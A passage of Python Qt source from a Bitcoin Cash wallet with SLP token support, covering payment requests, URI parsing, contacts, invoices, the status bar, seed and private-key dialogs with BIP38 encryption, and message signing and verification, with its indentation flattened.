cb_result = True
buttons, copy_index, copy_link = [ _('Ok') ], None, ''
try: txid = tx.txid() # returns None if not is_complete, but may raise potentially as well
except: txid = None
if txid is not None:
if tx_desc is not None:
self.wallet.set_label(txid, tx_desc)
copy_link = web.BE_URL(self.config, 'tx', txid)
if copy_link:
# tx is complete and there is a copy_link
buttons.insert(0, _("Copy link"))
copy_index = 0
if parent.show_message(_('Payment sent.') + '\n' + msg,
buttons = buttons,
defaultButton = buttons[-1],
escapeButton = buttons[-1]) == copy_index:
# There WAS a 'Copy link' and they clicked it
self.copy_to_clipboard(copy_link, _("Block explorer link copied to clipboard"), self.top_level_window())
self.invoice_list.update()
self.do_clear()
else:
if msg.startswith("error: "):
msg = msg.split(" ", 1)[-1] # take the last part, sans the "error: " prefix
parent.show_error(msg)
if callback:
callback(cb_result)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices, *, add_cancel_button=False):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
buts = [OkButton(dialog)]
if add_cancel_button:
buts.insert(0, CancelButton(dialog))
vbox.addLayout(Buttons(*buts))
result = dialog.exec_()
dialog.setParent(None)
if not result:
return None
return clayout.selected_index()
def lock_amount(self, b):
pass
# the following is now not needed since slp dust amounts are now hard coded
'''
This if-statement was added for SLP around the following two lines
in order to keep the amount field locked and Max button disabled
when the payto field is edited when a token is selected.
'''
# if self.is_slp_wallet and self.token_type_combo.currentData():
# self.amount_e.setFrozen(True)
# self.max_button.setEnabled(False)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.cointext = None
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
# Note: the below loop freezes all SLP widgets if present in the send
# tab; redo this when BIP70 supports SLP token sends. -Calin
for e in self.slp_send_tab_widgets:
e.setDisabled(True)
if self.is_slp_wallet:
# force SLP token type to 0 for payment requests
self.token_type_combo.setCurrentIndex(0)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
# New! Payment requests have an optional (may not be there!) attribute
# 'request_ok_callback' which takes 0 args and is called on request ok
# This facility was needed to do the CoinTextPopup label properly.
cb = getattr(self.payment_request, 'request_ok_callback', None)
if callable(cb):
cb()
def payment_request_error(self):
request_error = (self.payment_request and self.payment_request.error) or ''
self.payment_request = None
self.print_error("PaymentRequest error:", request_error)
self.show_error(_("There was an error processing the payment request"), rich_text=False, detail_text=request_error)
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
self.do_clear()
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
if 'ms-python' in URI: # this is needed for visual studio code debugger
return
self.show_error(_('Invalid Address URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
scheme = out.get('scheme')
address = out.get('address')
amounts = out.get('amounts')
label = out.get('label')
message = out.get('message')
op_return = out.get('op_return')
op_return_raw = out.get('op_return_raw')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(URI.split('?')[0])
if message:
self.message_e.setText(message)
if amounts:
if scheme == networks.net.CASHADDR_PREFIX and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif self.is_slp_wallet and scheme == networks.net.SLPADDR_PREFIX:
# pick first token in amounts
tokenid = None
for key in amounts:
if key != 'bch':
tokenid = key
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
if index == self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(0)
from .slp_add_token_dialog import SlpAddTokenDialog
def add_token_callback():
index = 1
while index < self.token_type_combo.count():
self.token_type_combo.setCurrentIndex(index)
if self.token_type_combo.currentData() == tokenid:
break
index+=1
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
SlpAddTokenDialog(self, token_id_hex = tokenid, token_name=None, allow_overwrite=True, add_callback=add_token_callback)
return
self.slp_amount_e.setAmount(amounts[tokenid]['amount'] * pow(10, self.slp_amount_e.token_decimals))
self.slp_amount_e.textEdited.emit("")
break
if tokenid == None and 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
elif 'bch' in amounts:
self.amount_e.setAmount(amounts['bch']['amount'])
self.amount_e.textEdited.emit("")
self.slp_extra_bch_cb.setChecked(True)
self.slp_extra_bch_cb.clicked.emit()
else:
self.show_error("Unsupported URI prefix: " + scheme)
if op_return:
self.message_opreturn_e.setText(op_return)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(False)
self.opreturn_label.setHidden(False)
elif op_return_raw is not None:
# 'is not None' allows blank value.
# op_return_raw is secondary precedence to op_return
if not op_return_raw:
op_return_raw='empty'
self.message_opreturn_e.setText(op_return_raw)
self.message_opreturn_e.setHidden(False)
self.opreturn_rawhex_cb.setHidden(False)
self.opreturn_rawhex_cb.setChecked(True)
self.opreturn_label.setHidden(False)
elif not self.config.get('enable_opreturn'):
self.message_opreturn_e.setText('')
self.message_opreturn_e.setHidden(True)
self.opreturn_rawhex_cb.setHidden(True)
self.opreturn_label.setHidden(True)
def do_clear(self):
''' Clears the send tab, reseting its UI state to its initiatial state.'''
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.message_opreturn_e]:
e.setText('')
e.setFrozen(False)
self.max_button.setDisabled(False)
KillPopupLabel("CoinTextPopup") # just in case it was alive
self.max_button.setChecked(False)
self.not_enough_funds = False
self.op_return_toolong = False
self.payment_request = None
self.payto_e.cointext = None
self.payto_e.is_pr = False
self.opreturn_rawhex_cb.setChecked(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.message_opreturn_e.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_rawhex_cb.setVisible(self.config.get('enable_opreturn', False))
self.opreturn_label.setVisible(self.config.get('enable_opreturn', False))
self.update_status()
self.amount_e.setHidden(False)
self.amount_label.setHidden(False)
if self.is_slp_wallet:
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
for e in self.slp_send_tab_widgets:
e.setDisabled(False)
self.slp_amount_e.setText('')
self.token_type_combo.setCurrentIndex(0)
self.on_slptok() # resets parts of the send tab to initial state
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_coin_state(self, utxos, freeze):
self.wallet.set_frozen_coin_state(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_converter_tab(self):
source_address = QLineEdit()
cash_address = ButtonsLineEdit()
cash_address.addCopyButton()
cash_address.setReadOnly(True)
legacy_address = ButtonsLineEdit()
legacy_address.addCopyButton()
legacy_address.setReadOnly(True)
slp_address = ButtonsLineEdit()
slp_address.setReadOnly(True)
slp_address.addCopyButton()
widgets = [
(cash_address, Address.FMT_CASHADDR),
(legacy_address, Address.FMT_LEGACY),
(slp_address, Address.FMT_SLPADDR)
]
def convert_address():
try:
addr = Address.from_string(source_address.text().strip())
except:
addr = None
for widget, fmt in widgets:
if addr:
widget.setText(addr.to_full_string(fmt))
else:
widget.setText('')
source_address.textChanged.connect(convert_address)
w = QWidget()
grid = QGridLayout()
grid.setSpacing(15)
grid.setColumnStretch(1, 2)
grid.setColumnStretch(2, 1)
label = QLabel(_('&Address to convert'))
label.setBuddy(source_address)
grid.addWidget(label, 0, 0)
grid.addWidget(source_address, 0, 1)
label = QLabel(_('&Cash address'))
label.setBuddy(cash_address)
grid.addWidget(label, 1, 0)
grid.addWidget(cash_address, 1, 1)
label = QLabel(_('&Legacy address'))
label.setBuddy(legacy_address)
grid.addWidget(label, 2, 0)
grid.addWidget(legacy_address, 2, 1)
grid.addWidget(QLabel(_('SLP address')), 3, 0)
grid.addWidget(slp_address, 3, 1)
w.setLayout(grid)
label = WWLabel(_(
"This tool helps convert between address formats for Bitcoin "
"Cash addresses.\nYou are encouraged to use the 'Cash address' "
"format."
))
vbox = QVBoxLayout()
vbox.addWidget(label)
vbox.addWidget(w)
vbox.addStretch(1)
w = QWidget()
w.setLayout(vbox)
return w
def create_list_tab(self, l, list_header=None):
class ListTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
w = ListTab()
w.main_window = self
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def create_slp_mgt_tab(self):
self.create_token_dialog = None
from .slp_mgt import SlpMgt
self.token_list = l = SlpMgt(self)
w = self.create_list_tab(l)
vbox = w.layout()
vbox.setSpacing(10)
create_button = b = QPushButton(_("Create New Token"))
create_button.setAutoDefault(False)
create_button.setDefault(False)
b.clicked.connect(self.show_create_token_dialog)
vbox.addWidget(create_button)
w.setLayout(vbox)
return w
def show_create_token_dialog(self):
c, u, x = self.wallet.get_balance()
bal = c + u - self.wallet.get_slp_locked_balance()
if bal < 1000:
self.receive_tab.low_balance_warning_shown = True
self.show_warning("Low BCH balance.\n\nBefore creating a new token you must add Bitcoin Cash to this wallet. We recommend a minimum of 0.0001 BCH to get started.\n\nSend BCH to the address displayed in the 'Receive' tab.")
self.show_receive_tab()
self.toggle_cashaddr(1, True)
return
try:
self.create_token_dialog.show()
self.create_token_dialog.raise_()
self.create_token_dialog.activateWindow()
except AttributeError:
self.create_token_dialog = d = SlpCreateTokenGenesisDialog(self,)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
self.cashaddr_toggled_signal.connect(l.update)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?"
.format(addr.to_ui_string()))):
self.wallet.delete_address(addr)
self.update_tabs()
self.update_status()
self.clear_receive_tab()
def get_coins(self, isInvoice = False):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config, isInvoice)
def get_slp_coins(self, isInvoice = False):
return self.wallet.get_slp_spendable_coins(self.slp_token_id, None, self.config, isInvoice)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.do_clear()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not Address.is_valid(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
old_entry = self.contacts.get(address, None)
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.update_completions()
# The contact has changed, update any addresses that are displayed with the old information.
run_hook('update_contact', address, self.contacts[address], old_entry)
return True
def delete_contacts(self, addresses):
contact_str = " + ".join(addresses) if len(addresses) <= 3 else _("{} contacts").format(len(addresses))
if not self.question(_("Remove {} from your list of contacts?")
.format(contact_str)):
return
removed_entries = []
for address in addresses:
if address in self.contacts.keys():
removed_entries.append((address, self.contacts[address]))
self.contacts.pop(address)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.contact_list.update()
self.update_completions()
run_hook('delete_contacts', removed_entries)
def add_token_type(self, token_class, token_id, token_name, decimals_divisibility, *, error_callback=None, show_errors=True, allow_overwrite=False):
# FIXME: are both args error_callback and show_errors both necessary?
# Maybe so if we want the default to be self.show_error...
if not show_errors:
# setting error_callback to None will suppress errors being shown
# iff show_errors is False
error_callback = None
if error_callback is None and show_errors:
# They asked for errors but supplied no callback. Use the standard
# one for main_window
error_callback = self.show_error
# The below call checks sanity and calls error_callback for us
# with an error message argument on failure, returning False.
# On success it will add the token, write to wallet storage,
# and potentially kick off the verifier.
if not self.wallet.add_token_safe(
token_class, token_id, token_name, decimals_divisibility,
error_callback=error_callback, allow_overwrite=allow_overwrite,
write_storage=True):
return False
# Great success! Update GUI.
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
return True
def delete_slp_token(self, token_ids):
if not self.question(_("Remove {} from your list of tokens?")
.format(" + ".join(token_ids))):
return
for tid in token_ids:
self.wallet.token_types.pop(tid)
self.token_list.update()
self.update_token_type_combo()
self.slp_history_list.update()
self.wallet.save_transactions(True)
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self.top_level_window(), _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1].to_ui_string(), pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
weakD = Weak.ref(d)
def do_export():
ext = pr.export_file_ext()
fn = self.getSaveFileName(_("Save invoice to file"), "*." + ext)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.export_file_data())
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.invoice_list.update()
d = weakD()
if d: d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
d.setParent(None) # So Python can GC
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console(wallet=self.wallet)
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
set_json = Weak(self.console.set_json)
c = commands.Commands(self.config, self.wallet, self.network, lambda: set_json(True))
methods = {}
password_getter = Weak(self.password_dialog)
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, *args, password_getter=password_getter,
**kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self._search_box_spacer = QWidget()
self._search_box_spacer.setFixedWidth(6) # 6 px spacer
self.search_box = QLineEdit()
self.search_box.setPlaceholderText(_("Search wallet, {key}F to hide").format(key='Ctrl+' if sys.platform != 'darwin' else '⌘'))
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box, 1)
self.addr_format_label = QLabel("")
sb.addPermanentWidget(self.addr_format_label)
self.update_available_button = StatusBarButton(QIcon(":icons/electron-cash-update.svg"), _("Update available, click for details"), lambda: self.gui_object.show_update_checker(self, skip_check=True))
self.update_available_button.setStatusTip(_("An Electron Cash update is available"))
sb.addPermanentWidget(self.update_available_button)
self.update_available_button.setVisible(bool(self.gui_object.new_version_available)) # if hidden now gets unhidden by on_update_available when a new version comes in
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
self.addr_converter_button = StatusBarButton(
self.cashaddr_icon(),
_("Toggle CashAddr Display"),
self.toggle_cashaddr_status_bar
)
sb.addPermanentWidget(self.addr_converter_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.svg"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
weakSelf = Weak(self)
gui_object = self.gui_object
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.svg"), _("Network"), lambda: gui_object.show_network_dialog(weakSelf))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def on_update_available(self, b):
self.update_available_button.setVisible(bool(b))
# The popup label won't really be shown unless this window is
# on top.. but regardless we give each label a unique internal name
# so they dont interfere with each other.
lblName = "UpdateAvailable_" + self.diagnostic_name()
if b:
ShowPopupLabel(name = lblName,
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Update Available"),_("Click for details")),
target=self.update_available_button,
timeout=20000, onClick=self.update_available_button.click,
onRightClick=self.update_available_button.click,
dark_mode = ColorScheme.dark_scheme)
else:
# Immediately kills any extant labels
KillPopupLabel(lblName)
def update_lock_icon(self):
icon = QIcon(":icons/lock.svg") if self.wallet.has_password() else QIcon(":icons/unlock.svg")
tip = _('Wallet Password') + ' - '
tip += _('Enabled') if self.wallet.has_password() else _('Disabled')
self.password_button.setIcon(icon)
self.password_button.setStatusTip(tip)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
is_cointext = bool(self.payto_e.cointext)
if is_cointext and self.slp_token_id:
self.token_type_combo.setCurrentIndex(0)
self.send_button.setVisible(not self.wallet.is_watching_only() and not is_cointext)
self.preview_button.setVisible(not is_cointext)
self.cointext_button.setVisible(is_cointext)
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self.top_level_window(), self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def get_passphrase_dialog(self, msg : str, title : str = None, *, permit_empty = False) -> str:
from .password_dialog import PassphraseDialog
d = PassphraseDialog(self.wallet, self.top_level_window(), msg, title, permit_empty = permit_empty)
return d.run()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.balance_label.setHidden(True)
self.statusBar().insertWidget(0, self._search_box_spacer)
self._search_box_spacer.show()
self.search_box.setFocus(1)
if self.search_box.text():
self.do_search(self.search_box.text())
else:
self._search_box_spacer.hide()
self.statusBar().removeWidget(self._search_box_spacer)
self.balance_label.setHidden(False)
self.do_search('')
def do_search(self, t):
'''Apply search text to all tabs. FIXME: if a plugin later is loaded
it will not receive the search filter -- but most plugins I know about
do not support searchable_list anyway, so hopefully it's a non-issue.'''
for i in range(self.tabs.count()):
tab = self.tabs.widget(i)
try:
tab.searchable_list.filter(t)
except (AttributeError, TypeError):
pass
def new_contact_dialog(self):
d = WindowModalDialog(self.top_level_window(), _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self.top_level_window(), _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton()
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path) # implicitly also calls stop_wallet
self.update_recently_visited(wallet_path) # this ensures it's deleted from the menu
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog, SeedBackupDialog
WhichClass = SeedBackupDialog if self.wallet.storage.get('wallet_seed_needs_backup') else SeedDialog
d = WhichClass(self.top_level_window(), seed, passphrase, wallet=self.wallet)
if d.exec_() == QDialog.Accepted:
# This banch is in case they were in the SeedBackupDialog; below
# makes the new non-warning icon (if any) take effect
self.update_status()
d.setParent(None) # gc now rather than later
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
d.setParent(None) # Help Python GC this sooner rather than later
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self.top_level_window(), _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel('{}: {}'.format(_("Address"), address)))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
pk_lbl = QLabel(_("Private key") + ':')
vbox.addWidget(pk_lbl)
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton()
# BIP38 Encrypt Button
def setup_encrypt_button():
encrypt_but = QPushButton(_("Encrypt BIP38") + "...")
f = encrypt_but.font(); f.setPointSize(f.pointSize()-1); encrypt_but.setFont(f) # make font -= 1
encrypt_but.setEnabled(bool(bitcoin.Bip38Key.canEncrypt()))
encrypt_but.setToolTip(_("Encrypt this private key using BIP38 encryption")
if encrypt_but.isEnabled() else
_("BIP38 encryption unavailable: install pycryptodomex to enable"))
border_color = ColorScheme.DEFAULT.as_color(False)
border_color.setAlphaF(0.65)
encrypt_but_ss_en = (
keys_e.styleSheet() + (("QPushButton { border: 1px solid %s; border-radius: 6px; padding: 2px; margin: 2px; } "
"QPushButton:hover { border: 1px solid #3daee9; } "
"QPushButton:disabled { border: 1px solid transparent; ") % (border_color.name(QColor.HexArgb)))
)
encrypt_but_ss_dis = ( keys_e.styleSheet() )
encrypt_but.setStyleSheet(encrypt_but_ss_en if encrypt_but.isEnabled() else encrypt_but_ss_dis)
def on_encrypt():
passphrase = self.get_passphrase_dialog(
msg = (
_("Specify a passphrase to use for BIP38 encryption.") + "\n" +
_("Save this passphrase if you save the generated key so you may decrypt it later.")
)
)
if not passphrase:
return
try:
bip38 = str(bitcoin.Bip38Key.encrypt(pk, passphrase))
keys_e.setText(bip38)
encrypt_but.setEnabled(False)
encrypt_but.setStyleSheet(encrypt_but_ss_dis)
pk_lbl.setText( _("BIP38 Key") + ":" )
self.show_message(_("WIF key has been encrypted using BIP38.\n\n"
"You may save this encrypted key to a file or print out its QR code and/or text.\n\n"
"It is strongly encrypted with the passphrase you specified and safe to store electronically. "
"However, the passphrase should be stored securely and not shared with anyone."))
except Exception as e:
if util.is_verbose:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
encrypt_but.clicked.connect(on_encrypt)
keys_e.addWidget(encrypt_but, 0)
setup_encrypt_button()
# /BIP38 Encrypt Button
vbox.addWidget(keys_e)
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=address.to_script().hex())
rds_e.addCopyButton()
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
try:
addr = Address.from_string(address)
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
if addr.kind != addr.ADDR_P2PKH:
msg_sign = ( _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' +
_('The operation is undefined. Not just in Electron Cash, but in general.') )
self.show_message(_('Cannot sign messages with this type of address.') + '\n\n' + msg_sign)
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(addr):
self.show_message(_('Address not in wallet.'))
return
task = partial(self.wallet.sign_message, addr, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
try:
address = Address.from_string(address.text().strip())
except:
self.show_message(_('Invalid Bitcoin Cash address.'))
return
message = message.toPlainText().strip().encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(signature.toPlainText())
verified = bitcoin.verify_message(address, sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=None):
d = WindowModalDialog(self.top_level_window(), _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address.to_ui_string() if address else '')
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
